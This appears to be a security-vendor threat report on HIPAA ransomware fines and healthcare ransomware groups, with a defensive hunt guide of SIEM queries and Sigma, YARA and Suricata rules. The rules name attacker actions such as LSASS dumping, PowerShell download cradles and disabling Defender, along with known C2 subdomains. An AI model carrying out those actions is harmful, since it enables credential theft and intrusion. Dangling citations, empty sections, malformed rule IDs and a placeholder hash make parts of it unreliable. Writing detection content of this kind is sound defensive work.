OCR Drops $1.16M in HIPAA Fines as Healthcare Ransomware Groups Escalate Double Extortion

$1.16 Million in Fines, 427,000 Patients Exposed

The Office for Civil Rights (OCR) imposed $1,165,000 in financial penalties against four healthcare organizations this month for HIPAA Security Rule violations directly tied to ransomware attacks [1]. The combined breaches exposed electronic protected health information (ePHI) of approximately 427,000 individuals [1][2]. Every organization in the enforcement actions failed to conduct accurate, timely, and thorough risk assessments, the single most common deficiency OCR flags in its investigations [2].

These four settlements bring OCR's 2026 enforcement tally to $1,278,000 in total penalties collected so far this year [1]. The fines land at a moment when healthcare ransomware attacks are accelerating: the sector saw a 36% surge in incidents during late 2025 [3], and 96% of healthcare ransomware attacks now involve data theft before encryption [22]. Organizations relying solely on backup strategies for ransomware resilience are operating on outdated assumptions.

Risk Assessment Failures: The $1.7 Million Pattern

Weak security risk analysis is the recurrent theme across HIPAA enforcement actions, and these cases are no exception [2]. OCR found that each of the four organizations either skipped risk assessments entirely, performed them superficially, or failed to remediate the vulnerabilities they identified [1][2]. Risk analysis under the HIPAA Security Rule isn't optional. It's the foundational requirement that every other administrative, physical, and technical safeguard depends on.

The math is straightforward. These organizations paid roughly $2.73 per compromised patient record in regulatory fines alone. That figure is trivial compared to the actual cost of a healthcare breach: $7.42 million on average, making healthcare the most expensive sector for data breaches [27]. The regulatory penalty is a rounding error next to the operational, legal, and reputational damage.

OCR has stated plainly that hacking and ransomware are the most frequent type of large breach reported to their office [1].

The Brockton Hospital Attack: Anatomy of Modern Healthcare Ransomware

The Anubis ransomware group's attack on Brockton Hospital (Signature Healthcare) provides a concrete example of what these threats look like in practice. The attack was detected on April 6, 2026 [11]. By April 9, Anubis claimed responsibility on its data leak site, complete with a countdown timer pressuring the hospital to pay [13].

The damage was immediate and severe. Brockton Hospital's emergency room went on divert, routing ambulances to alternate facilities [11]. The hospital announced it would continue operating under downtime procedures for two weeks [11].

Anubis representatives told SuspectFile that approximately 2TB of data was exfiltrated, including patient-related information [13]. They used double extortion: encrypting files while simultaneously threatening to publish stolen data on their leak site [13][14]. The attack follows the pattern now seen in 96% of healthcare ransomware incidents, where data theft precedes encryption [22].

The Threat Landscape: Cartels, Coalitions, and Converging Groups

Healthcare organizations aren't facing isolated criminal groups. They're dealing with an organized, increasingly consolidated ransomware ecosystem.

Anubis operates as a Ransomware-as-a-Service (RaaS) platform with a focus on double extortion tactics [14]. The Brockton Hospital attack demonstrated the group's willingness to target hospitals directly, accepting the scrutiny that comes with disrupting emergency medical services.

DragonForce formally restructured as a ransomware cartel in March 2025, forming a coalition with LockBit and Qilin to share techniques and infrastructure [11]. The group absorbed RansomHub and actively targets competitors like Mamona and BlackLock [11]. DragonForce's ransomware uses the ChaCha8 encryption algorithm and supports multiple command-line arguments for local and network encryption modes [12]. Initial access in observed cases has come through compromised remote desktop servers [12].

Interlock emerged in September 2024 and has heavily targeted the healthcare sector [9]. FBI investigations identified active command-and-control infrastructure using Cloudflare tunneling, with the group deploying custom encryptors for both Windows and Linux systems [9]. Interlock actors have been observed using Cobalt Strike and SystemBC for C2 communications [9].

Akira has claimed $244.17 million in ransom proceeds as of September 2025 [10]. The group operates under multiple aliases, including Storm-1567, Howling Scorpius, Punk Spider, and Gold Sahara [10]. Akira deploys the Megazord encryptor and Akira_v2 variants, targeting critical infrastructure broadly [10].

Qilin (also known as Agenda ransomware) focuses heavily on credential theft, including LSASS memory dumping for privilege escalation [13]. The group claimed responsibility for an attack on ApolloMD Business Services [24].

Over 7,500 organizations appeared on dark web leak sites in 2025, a 58% jump from 2024 [24].

IOC Table

MITRE ATT&CK Mapping

Detection and Hunting Guidance

Monitor for Cloudflare tunnel abuse. Interlock's C2 infrastructure uses trycloudflare.com subdomains [9]. Hunt for DNS queries resolving to .trycloudflare.com from internal hosts that shouldn't be using Cloudflare tunnels. SIEM query example: index=dns query=".trycloudflare.com" | stats count by src_ip and investigate any hits from endpoints or servers.

Watch for LSASS access patterns. Qilin's heavy reliance on LSASS memory dumping for credential theft [13] means Sysmon Event ID 10 (ProcessAccess) targeting lsass.exe is a critical detection point. Filter for TargetImage containing lsass.exe with GrantedAccess values like 0x1010 or 0x1FFFFF.

Track large outbound data transfers. The 2TB exfiltration from Brockton Hospital [13] would have generated significant outbound traffic. Set alerting thresholds on egress volume per host, particularly for connections to cloud storage providers and unfamiliar external IPs. Any single host pushing hundreds of gigabytes outbound over hours warrants immediate investigation.

Detect Cobalt Strike and SystemBC beacons. Both are used by Interlock actors [9] and DragonForce [12]. JA3/JA3S fingerprinting, beacon interval analysis, and named pipe monitoring (\\.\pipe\msagent_) can surface these C2 frameworks.

Look for ransomware staging indicators. Files with .akira, .powerranges extensions [10], or the ransom note fn.txt [10] indicate encryption has already begun. More useful: monitor for mass file rename operations, deletion of Volume Shadow Copies (vssadmin delete shadows), and disabling of Windows Defender via PowerShell or registry modification.

Analysis

OCR's enforcement actions are calibrated to send a message, but the fines are modest relative to actual breach costs. At $7.42 million per healthcare breach on average [27], a $290,000 penalty (the rough per-organization average in this round) barely registers as a financial deterrent. The corrective action plans and monitoring periods attached to these settlements likely carry more operational weight than the dollar amounts.

The 36% surge in healthcare ransomware during late 2025 [3] coincides with organizational consolidation among threat actors. DragonForce's cartel structure with LockBit and Qilin [11] represents a maturation of the RaaS ecosystem. Shared infrastructure and techniques lower the barrier for affiliates to conduct sophisticated operations, including the kind of double extortion that hit Brockton Hospital.

References

1. OCR Fines Four Regulated Entities for HIPAA Violations That Led to Ransomware Attacks
2. Weak Risk Analysis Cost 4 Firms $1.7 Million in HIPAA Fines
3. Healthcare Ransomware Attacks: OC Practices & Cybersecurity
4. Brockton Hospital Ransomware Attack: Downtime Procedures to Continue for Two Weeks
5. Brockton Hospital Implements Downtime Procedure After Ransomware Attack
6. February 2026 Healthcare Data Breach Report
7. Ransomware Statistics 2026: Attacks, Costs & Trends
8. 60+ Healthcare Data Breach Statistics for 2026
9. #StopRansomware: Interlock | CISA
10. #StopRansomware: Akira Ransomware | CISA
11. DragonForce Calls for Ransomware Cartel with LockBit and Qilin
12. Detailed Analysis of DragonForce Ransomware
13. Qilin/Agenda Ransomware: The Credential Stealers
14. Healthcare Ransomware Attacks: OC Practices & Cybersecurity
15. 2025 Healthcare Data Breach Report
16. Healthcare Sector Most Targeted by Ransomware Groups as Attacks Increase 49% YOY
17. Data Breach Statistics 2026: Records, Costs & Industries

Hunt Guide: Hunt Report: Healthcare Ransomware Cartels - Anubis, DragonForce, and Affiliated Groups

Hypothesis: If healthcare-targeting ransomware groups (Anubis, DragonForce, Interlock, Akira, Qilin) are active in our environment, we expect to observe Cloudflare tunnel abuse, LSASS credential dumping, large-scale data exfiltration (>1TB), and specific ransomware staging behaviors in Sysmon, DNS, network flow, and Windows Security logs.

Intelligence Summary: OCR imposed $1.16M in HIPAA fines against four healthcare organizations for ransomware-related breaches affecting 427,000 patients. The Anubis group's April 2026 attack on Brockton Hospital demonstrates the current double extortion model: 2TB data exfiltration followed by encryption, forcing ER diversion and two-week downtime. DragonForce's formal restructuring as a ransomware cartel with LockBit and Qilin signals increasing professionalization and resource sharing among threat actors.

Confidence: High | Priority: Critical

Scope

• Networks: All clinical networks, patient data repositories, backup systems, and domain controllers. Focus on Tier 0 assets and electronic health record (EHR) systems.
• Timeframe: Initial sweep: 30 days historical. Continuous hunting: Real-time to 7 days rolling window. Extended lookback to 90 days for Cloudflare tunnel abuse.
• Priority Systems: EHR systems, PACS/imaging systems, lab information systems, domain controllers, backup servers, internet-facing clinical applications, VPN gateways

MITRE ATT&CK Techniques

T1190 — Exploit Public-Facing Application (Initial Access) [P2]

Healthcare ransomware groups exploit vulnerable internet-facing applications including unpatched VPN appliances, RDP servers, and web applications for initial access

Splunk SPL:

index=web_logs status>=400 | stats count by src_ip, dest_port, uri_path | where count>50 | lookup threat_intel_ip src_ip OUTPUT threat_score | where threat_score>0 OR dest_port IN (3389,443,8443)

Elastic KQL:

event.category:web AND http.response.status_code:>=400 | stats count by source.ip, destination.port, url.path | where count > 50

Sigma Rule:

title: Suspicious Web Application Exploitation Attempts
id: a7c3d773-3a4f-4e6b-9e3c-8b4d5f7e9c2a
status: experimental
author: RedSheep Security/Stone
date: 2026/04/07
description: Detects multiple failed web requests from single source indicating scanning/exploitation
references:
  - Internal Research
logsource:
  category: webserver
detection:
  selection:
    sc-status:
      - 400
      - 401
      - 403
      - 404
      - 500
  timeframe: 5m
  condition: selection | count(c-ip) by c-ip > 50
falsepositives:
  - Legitimate vulnerability scanners
  - Web crawlers
level: medium

Focus on internet-facing clinical applications, patient portals, and VPN gateways. Correlate with authentication logs for successful logins after scanning activity.

T1003.001 — OS Credential Dumping: LSASS Memory (Credential Access) [P1]

Qilin/Agenda ransomware heavily relies on LSASS memory dumping for credential theft and lateral movement

Splunk SPL:

index=sysmon EventCode=10 TargetImage="*\\lsass.exe" GrantedAccess IN ("0x1010","0x1410","0x1438","0x143a","0x1fffff") | eval suspicious_process=case(match(SourceImage,"(?i)(mimikatz|procdump|sqldumper)"),"Critical", match(SourceImage,"(?i)(taskmgr|werfault)"),"Medium", 1=1,"Low") | where suspicious_process!="Low" | table _time ComputerName SourceImage TargetImage GrantedAccess CallTrace

Elastic KQL:

event.code:10 AND process.name:lsass.exe AND winlog.event_data.GrantedAccess:(0x1010 OR 0x1410 OR 0x1438 OR 0x143a OR 0x1fffff) AND NOT process.parent.name:(svchost.exe OR csrss.exe OR wininit.exe)

Sigma Rule:

title: LSASS Memory Access by Suspicious Process
id: 5ef9853e-4d0e-4a70-846f-a9ca37d876fh
status: stable
author: Florian Roth
date: 2022/03/13
modified: 2026/04/07
description: Detects process access to LSASS memory with suspicious access flags
references:
  - https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights
  - https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_access/proc_access_win_lsass_memdump.yml
logsource:
  category: process_access
  product: windows
detection:
  selection:
    TargetImage|endswith: '\lsass.exe'
    GrantedAccess|startswith:
      - '0x40'
      - '0x100000'
      - '0x1410'
      - '0x1438'
      - '0x143a'
      - '0x1418'
      - '0x1f0fff'
      - '0x1f1fff'
      - '0x1f2fff'
      - '0x1f3fff'
  filter_exact:
    SourceImage:
      - 'C:\WINDOWS\system32\taskmgr.exe'
      - 'C:\Windows\System32\perfmon.exe'
  filter_generic:
    SourceImage|startswith:
      - 'C:\Program Files\'
      - 'C:\Program Files (x86)\'
    GrantedAccess: '0x1410'
  filter_defender:
    SourceImage|startswith: 'C:\ProgramData\Microsoft\Windows Defender\'
    SourceImage|endswith: '\MsMpEng.exe'
  filter_defender_atp:
    SourceImage|endswith: '\MsSense.exe'
  condition: selection and not 1 of filter*
falsepositives:
  - Legitimate security products
level: high

Enable Credential Guard where possible. Monitor for process creation of known LSASS dumping tools. Alert on any non-system process accessing LSASS with these specific access rights.

T1041 — Exfiltration Over C2 Channel (Exfiltration) [P1]

Ransomware groups exfiltrate large volumes of data (2TB in Brockton case) before encryption for double extortion

Splunk SPL:

index=netflow | eval total_bytes=bytes_in+bytes_out | stats sum(total_bytes) as total_transfer by src_ip, dest_ip | eval total_gb=round(total_transfer/1073741824,2) | where total_gb>100 AND NOT cidrmatch("10.0.0.0/8",dest_ip) AND NOT cidrmatch("172.16.0.0/12",dest_ip) AND NOT cidrmatch("192.168.0.0/16",dest_ip) | lookup cdn_whitelist dest_ip OUTPUT is_cdn | where isnull(is_cdn) | sort - total_gb

Elastic KQL:

event.category:network_traffic | stats sum(network.bytes) as total_bytes by source.ip, destination.ip | where total_bytes > 107374182400 AND NOT destination.ip:10.0.0.0/8 AND NOT destination.ip:172.16.0.0/12 AND NOT destination.ip:192.168.0.0/16

Sigma Rule:

title: Massive Data Transfer to External IP
id: 8b3e7a52-5f31-4a22-9a0f-8c5d4e7c3b9e
status: experimental
author: RedSheep Security/Stone
date: 2026/04/07
description: Detects large data transfers (>100GB) to external IPs potentially indicating exfiltration
references:
  - Internal Incident Response
logsource:
  category: firewall
detection:
  selection:
    EventID: 5156
    Direction: outbound
  filter:
    DestinationIp|cidr:
      - 10.0.0.0/8
      - 172.16.0.0/12  
      - 192.168.0.0/16
  timeframe: 24h
  condition: selection and not filter | sum(BytesSent) by SourceIp,DestinationIp > 107374182400
fields:
  - SourceIp
  - DestinationIp
  - BytesSent
falsepositives:
  - Legitimate backup to cloud storage
  - Large file transfers to partners
level: high

Set baseline thresholds per critical server. 2TB exfiltration would occur over hours/days. Monitor for sustained high-volume transfers to non-business IPs.

T1102.002 — Web Service: Bidirectional Communication (Command and Control) [P1]

Interlock uses Cloudflare tunnels (*.trycloudflare.com) for C2 infrastructure to evade network controls

Splunk SPL:

index=dns (query="*.trycloudflare.com" OR answer="*.trycloudflare.com") | rex field=query "(?<subdomain>[^.]+)\.trycloudflare\.com" | stats count earliest(_time) as first_seen latest(_time) as last_seen values(src_ip) as source_ips by subdomain | eval duration=round((last_seen-first_seen)/3600,2) | where count>10 OR duration>1

Elastic KQL:

dns.question.name:*.trycloudflare.com OR dns.answers.name:*.trycloudflare.com | stats count min(@timestamp) as first_seen max(@timestamp) as last_seen by dns.question.name, source.ip

Sigma Rule:

title: Cloudflare Tunnel Abuse for C2
id: 3f3f3e3e-4d0e-4a70-846f-a9ca37d876fd
status: experimental
author: RedSheep Security/Stone
date: 2026/04/07
description: Detects DNS queries to trycloudflare.com subdomains potentially used for C2
references:
  - https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-203a
logsource:
  category: dns
detection:
  selection:
    query|contains: '.trycloudflare.com'
  filter:
    query:
      - 'www.trycloudflare.com'
      - 'blog.trycloudflare.com'
      - 'support.trycloudflare.com'
  condition: selection and not filter
falsepositives:
  - Legitimate use of Cloudflare tunnels
  - Developer testing
level: medium

Block .trycloudflare.com at DNS level unless explicitly authorized. These subdomains (existed-bunch-balance-council, ferrari-rolling-facilities-lounge, ranked-accordingly-ab-hired) are known Interlock C2.*

T1059.001 — PowerShell (Execution) [P2]

PowerShell used by Interlock and DragonForce for payload execution, defense evasion, and system discovery

Splunk SPL:

index=windows source="WinEventLog:Microsoft-Windows-PowerShell/Operational" EventCode=4104 | eval decoded_block=replace(ScriptBlockText,"\s+"," ") | rex field=decoded_block max_match=0 "(?i)(invoke-expression|iex|downloadstring|encodedcommand|bypass|hidden|noprofile|windowstyle\s+hidden|bitsadmin|certutil|mshta|regsvr32)" | where match(decoded_block,"(?i)(invoke-expression|iex|downloadstring|encodedcommand)") | eval risk_score=case(match(decoded_block,"(?i)encodedcommand"),10, match(decoded_block,"(?i)downloadstring"),8, match(decoded_block,"(?i)bypass.*hidden"),9, 1=1,5) | where risk_score>=8

Elastic KQL:

event.code:4104 AND powershell.script_block_text:(Invoke-Expression OR IEX OR DownloadString OR EncodedCommand OR "-Bypass" OR "-Hidden" OR "-NoProfile")

Sigma Rule:

title: Suspicious PowerShell Download and Execute Pattern
id: 6b3e6e3e-4d0e-4a70-846f-a9ca37d876fg
status: experimental
author: RedSheep Security/Stone
date: 2026/04/07
description: Detects PowerShell patterns commonly used in ransomware attacks
references:
  - Internal TTP Analysis
logsource:
  product: windows
  service: powershell
  definition: Script block logging must be enabled
detection:
  selection_downloads:
    EventID: 4104
    ScriptBlockText|contains:
      - 'DownloadString'
      - 'DownloadFile'
      - 'Invoke-WebRequest'
      - 'Invoke-RestMethod'
      - 'System.Net.WebClient'
  selection_execution:
    ScriptBlockText|contains:
      - 'Invoke-Expression'
      - 'IEX'
      - '&('
      - '.('
  selection_encoding:
    ScriptBlockText|contains:
      - 'FromBase64String'
      - 'EncodedCommand'
  condition: selection_downloads and (selection_execution or selection_encoding)
falsepositives:
  - Legitimate administrative scripts
  - Software deployment tools
level: high

Enable PowerShell ScriptBlock logging via Group Policy. Focus on encoded commands, download cradles, and AMSI bypass attempts.

T1486 — Data Encrypted for Impact (Impact) [P1]

Ransomware encryption using known extensions (.akira, .powerranges) and ransom note drops (fn.txt)

Splunk SPL:

index=sysmon EventCode=11 | rex field=TargetFilename "(?<extension>\.[^\.]+)$" | where extension IN (".akira",".powerranges",".anubis",".dragonforce",".interlock") OR TargetFilename="*\\fn.txt" OR TargetFilename="*\\README*.txt" | stats count earliest(_time) as first_seen latest(_time) as last_seen dc(TargetFilename) as unique_files by ComputerName, Image, extension | where unique_files>100 OR extension IN (".akira",".powerranges")

Elastic KQL:

event.code:11 AND (file.path:*.akira OR file.path:*.powerranges OR file.name:fn.txt OR file.name:README*.txt) | stats count by host.name, process.name, file.extension

Sigma Rule:

title: Ransomware File Extension Creation
id: 7d3e6e3e-4d0e-4a70-846f-a9ca37d876ff
status: stable
author: Florian Roth
date: 2022/06/14
modified: 2026/04/07
description: Detects known ransomware extensions being created
references:
  - https://github.com/SigmaHQ/sigma/blob/master/rules/windows/file_event/file_event_win_ransomware_unusual_extension.yml
logsource:
  product: windows
  category: file_event
detection:
  selection:
    TargetFilename|endswith:
      - '.akira'
      - '.powerranges'
      - '.anubis'
      - '.dragonforce'
      - '.interlock'
      - '.qilin'
      - '.agenda'
  selection_notes:
    TargetFilename|endswith:
      - '\fn.txt'
      - '\README.txt'
      - '\RECOVER.txt'
  condition: selection or selection_notes
falsepositives:
  - Unlikely
level: critical

Monitor for mass file renaming operations. Alert on creation of known ransom note filenames. Implement canary files in critical directories.

T1562.001 — Impair Defenses: Disable or Modify Tools (Defense Evasion) [P1]

Ransomware groups disable Windows Defender and other security tools before encryption

Splunk SPL:

index=windows (source=WinEventLog:Security EventCode=4688 OR source=sysmon EventCode=1) (CommandLine="*Set-MpPreference*" OR CommandLine="*DisableRealtimeMonitoring*" OR CommandLine="*DisableIOAVProtection*" OR CommandLine="*Add-MpPreference*ExclusionPath*" OR CommandLine="*sc stop*" OR CommandLine="*net stop*") | regex CommandLine="(?i)(windefend|defender|sense|mbam|symantec|mcafee|kaspersky|sophos|crowdstrike)" | table _time ComputerName User CommandLine ParentCommandLine

Elastic KQL:

process.command_line:("Set-MpPreference" OR "DisableRealtimeMonitoring" OR "DisableIOAVProtection" OR "sc stop" OR "net stop") AND process.command_line:(windefend OR defender OR sense OR mbam OR symantec OR mcafee)

Sigma Rule:

title: Windows Defender Tampering via PowerShell
id: 8d3e6e3e-4d0e-4a70-846f-a9ca37d876fe
status: experimental
author: RedSheep Security/Stone
date: 2026/04/07
description: Detects attempts to disable Windows Defender via PowerShell
references:
  - https://docs.microsoft.com/en-us/powershell/module/defender/
logsource:
  category: process_creation
  product: windows
detection:
  selection_mppreference:
    CommandLine|contains:
      - 'Set-MpPreference'
      - 'Add-MpPreference'
  selection_params:
    CommandLine|contains:
      - 'DisableRealtimeMonitoring'
      - 'DisableIOAVProtection'
      - 'DisableBehaviorMonitoring'
      - 'DisableScriptScanning'
      - 'ExclusionPath C:\'
      - 'ExclusionProcess'
  selection_service:
    CommandLine|contains:
      - 'sc stop WinDefend'
      - 'net stop WinDefend'
      - 'Stop-Service WinDefend'
  condition: selection_mppreference and selection_params or selection_service
falsepositives:
  - Legitimate administrator tasks
  - AV management tools
level: high

Enable tamper protection via Group Policy. Alert on any attempt to modify Defender settings or stop security services.

T1055 — Process Injection (Defense Evasion) [P2]

Used by multiple ransomware groups for defense evasion and privilege escalation

Splunk SPL:

index=sysmon EventCode=8 | eval suspicious_target=case(match(TargetImage,"(?i)(explorer\.exe|svchost\.exe|winlogon\.exe|services\.exe|lsass\.exe|csrss\.exe)"),1,1=1,0) | eval suspicious_source=case(match(SourceImage,"(?i)(powershell\.exe|cmd\.exe|rundll32\.exe|regsvr32\.exe|mshta\.exe|wscript\.exe|cscript\.exe)"),1,1=1,0) | where suspicious_target=1 OR suspicious_source=1 | table _time ComputerName SourceImage TargetImage StartFunction StartModule

Elastic KQL:

event.code:8 AND (process.target.name:(explorer.exe OR svchost.exe OR winlogon.exe OR services.exe OR lsass.exe) OR process.parent.name:(powershell.exe OR cmd.exe OR rundll32.exe))

Focus on injection into critical system processes. Cobalt Strike commonly injects into svchost.exe and explorer.exe.

T1046 — Network Service Scanning (Discovery) [P3]

Internal reconnaissance post-compromise to identify high-value targets for encryption and lateral movement

Splunk SPL:

index=firewall action=allowed | stats dc(dest_port) as unique_ports values(dest_port) as ports_scanned earliest(_time) as first_seen latest(_time) as last_seen by src_ip, dest_ip | where unique_ports>20 | eval scan_duration=round((last_seen-first_seen)/60,2) | where scan_duration<10

Elastic KQL:

event.action:allowed | stats cardinality(destination.port) as unique_ports by source.ip, destination.ip | where unique_ports > 20

Baseline normal port usage patterns. Alert on hosts suddenly scanning multiple ports across multiple internal systems.

Indicators of Compromise

IOC Sweep Queries (Splunk):

index=dns (query="existed-bunch-balance-council.trycloudflare.com" OR answer="existed-bunch-balance-council.trycloudflare.com") | stats count by src_ip, query_type, answer

index=dns (query="ferrari-rolling-facilities-lounge.trycloudflare.com" OR answer="ferrari-rolling-facilities-lounge.trycloudflare.com") | stats count by src_ip, query_type, answer

index=dns (query="ranked-accordingly-ab-hired.trycloudflare.com" OR answer="ranked-accordingly-ab-hired.trycloudflare.com") | stats count by src_ip, query_type, answer

index=* source=*sysmon* EventCode=11 TargetFilename="*\\fn.txt" | table _time ComputerName TargetFilename Image User

index=* source=*sysmon* EventCode=11 TargetFilename="*.akira" | stats count by ComputerName, Image | where count>10

index=* source=*sysmon* EventCode=11 TargetFilename="*.powerranges" | stats count by ComputerName, Image | where count>10

YARA Rules

Akira_Ransomware_Indicators — Detects Akira ransomware variants including ransom notes and file markers

rule Akira_Ransomware_Indicators {
    meta:
        description = "Detects Akira ransomware variants and ransom notes"
        author = "RedSheep Security/Stone"
        date = "2026-04-07"
        reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-109a"
        hash1 = "example_hash_would_go_here"
        
    strings:
        $note1 = "fn.txt" nocase
        $note2 = "AKIRA_README.txt" nocase
        $extension1 = ".akira" nocase
        $extension2 = ".powerranges" nocase
        $ransom_text1 = "Your network has been encrypted" nocase
        $ransom_text2 = "We have also downloaded" nocase
        $ransom_text3 = "Do not try to decrypt" nocase
        $mutex1 = "akira_mutex" wide ascii
        $pdb1 = "akira.pdb" nocase
        
    condition:
        any of ($note*) or 
        any of ($extension*) or
        2 of ($ransom_text*) or
        any of ($mutex*, $pdb*)
}

Cobalt_Strike_Beacon_Indicators — Detects Cobalt Strike beacons used by Interlock and DragonForce actors

rule Cobalt_Strike_Beacon_Indicators {
    meta:
        description = "Detects Cobalt Strike beacon indicators"
        author = "Elastic"
        date = "2021-03-16"
        reference = "https://www.elastic.co/blog/detecting-cobalt-strike-with-memory-signatures"
        
    strings:
        $beacon_x64_1 = { 48 89 5C 24 08 48 89 74 24 10 57 48 83 EC 20 49 8B F0 8B DA 48 8B F9 45 84 C9 }
        $beacon_x86_1 = { 8B 55 08 53 56 8B 75 0C 57 8D 04 32 8B 00 89 45 08 8B 45 10 85 C0 }
        $beacon_dll_1 = { 73 70 72 6F 63 5F 61 64 64 }
        $beacon_dll_2 = { 69 6E 73 74 61 6E 63 65 5F 64 61 74 61 }
        $beacon_config = { 00 01 00 01 00 02 }
        $sleep_mask = { 48 8B C4 48 89 58 08 48 89 68 10 48 89 70 18 48 89 78 20 45 33 DB }
        
    condition:
        any of ($beacon_x64*, $beacon_x86*) or
        all of ($beacon_dll*) or
        $beacon_config or
        $sleep_mask
}

SystemBC_RAT — Detects SystemBC RAT used by ransomware groups for C2 communications

rule SystemBC_RAT {
    meta:
        description = "Detects SystemBC RAT components"
        author = "RedSheep Security/Stone"
        date = "2026-04-07"
        reference = "Internal Research"
        
    strings:
        $str1 = "SystemBC" wide ascii
        $str2 = "bcdedit.exe" wide ascii
        $str3 = "socks5" wide ascii
        $str4 = "\\pipe\\" wide
        $mutex1 = "Global\\SystemBC" wide ascii
        $pdb1 = "SystemBC.pdb" ascii
        $hex1 = { 53 79 73 74 65 6D 42 43 }
        
    condition:
        2 of them
}

Suricata Rules

SID 2051001 — Detects Interlock C2 Cloudflare tunnel DNS queries

alert dns $HOME_NET any -> any any (msg:"ET MALWARE Interlock C2 Cloudflare Tunnel DNS Query"; dns.query; content:"trycloudflare.com"; nocase; pcre:"/^(existed-bunch-balance-council|ferrari-rolling-facilities-lounge|ranked-accordingly-ab-hired)\.trycloudflare\.com$/i"; reference:url,www.cisa.gov/news-events/cybersecurity-advisories/aa25-203a; classtype:trojan-activity; sid:2051001; rev:1;)

SID 2051002 — Detects potential Cobalt Strike beacon traffic patterns

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET MALWARE Possible Cobalt Strike Beacon Activity"; flow:established,to_server; content:"POST"; http_method; content:"/submit.php"; http_uri; content:"Content-Type|3a 20|application/octet-stream"; http_header; byte_test:2,>,1000,0,relative; threshold:type limit,track by_src,count 1,seconds 60; reference:url,blog.sekoia.io/hunting-and-detecting-cobalt-strike; classtype:trojan-activity; sid:2051002; rev:1;)

SID 2051003 — Detects large outbound data transfer potentially indicating exfiltration

alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"ET POLICY Potential Data Exfiltration - Large Outbound Transfer"; flow:established,to_server; byte_extract:4,0,bytes_sent,relative; byte_test:4,>,1073741824,0,bytes_sent,relative; threshold:type limit,track by_src,count 1,seconds 3600; reference:url,internal; classtype:policy-violation; sid:2051003; rev:1;)

Data Source Requirements

Sources

• OCR Fines Four Regulated Entities for HIPAA Violations That Led to Ransomware Attacks
• Weak Risk Analysis Cost 4 Firms $1.7 Million in HIPAA Fines
• Healthcare Ransomware Attacks: OC Practices & Cybersecurity
• Brockton Hospital Ransomware Attack: Downtime Procedures to Continue for Two Weeks
• Brockton Hospital Implements Downtime Procedure After Ransomware Attack
• February 2026 Healthcare Data Breach Report
• Ransomware Statistics 2026: Attacks, Costs & Trends
• 60+ Healthcare Data Breach Statistics for 2026
• #StopRansomware: Interlock | CISA
• #StopRansomware: Akira Ransomware | CISA
• DragonForce Calls for Ransomware Cartel with LockBit and Qilin
• Detailed Analysis of DragonForce Ransomware
• Qilin/Agenda Ransomware: The Credential Stealers
• 2025 Healthcare Data Breach Report
• Healthcare Sector Most Targeted by Ransomware Groups as Attacks Increase 49% YOY
• Data Breach Statistics 2026: Records, Costs & Industries